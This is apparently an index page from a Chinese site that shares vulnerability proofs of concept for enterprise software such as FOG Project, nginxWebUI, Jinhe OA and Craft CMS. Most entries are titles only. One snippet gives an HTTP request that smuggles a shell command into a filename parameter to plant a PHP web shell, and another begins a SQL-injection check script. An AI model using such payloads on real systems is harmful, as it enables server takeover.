POC_秃兔安全

更新

浏览

【通用】 nginxWebUI getAuth 命令执行

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证

dreamer2928个月前

0949

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...

2024你懂的

秃兔8个月前

0715

同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞

2024你懂的

秃兔8个月前

08110

金和OAC6-FileDownLoad.aspx任意文件读取漏洞

2024你懂的

秃兔8个月前

04414

⻜企互联loginService任意登录

2024你懂的

秃兔8个月前

05311

捷诚管理信息系统 SQL注入漏洞

import timeimport requests def verify(ip):url = f'{ip}EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx’headers = { 登录可见余下内容

2024你懂的

秃兔8个月前

0955

金万维-云联应用系统接入平台GNRemote.dll前台存在RCE漏洞

2024你懂的

秃兔8个月前

07615

蓝凌EIS智慧协同平台frm_button_func.aspx SQL注入

2024你懂的

秃兔8个月前

06515

【通用】 Craft CMS模板注入导致RCE(CVE-2024-56145)

fofa语句yakit插件 uuidnuclei yaml只写了快速检验是否存疑的脚本，具体的利用方式在网上可以找得到。

# poc # yakit # nuclei

dreamer2928个月前

0897

【通用】Scan2Net平台远程命令执行漏洞（CVE-2024-28138）

fofapocyaml已验证，有存在的

付费阅读500 # poc # yaml

dreamer2925个月前

010915

上一页 1…35 363738 39…53 下一页跳转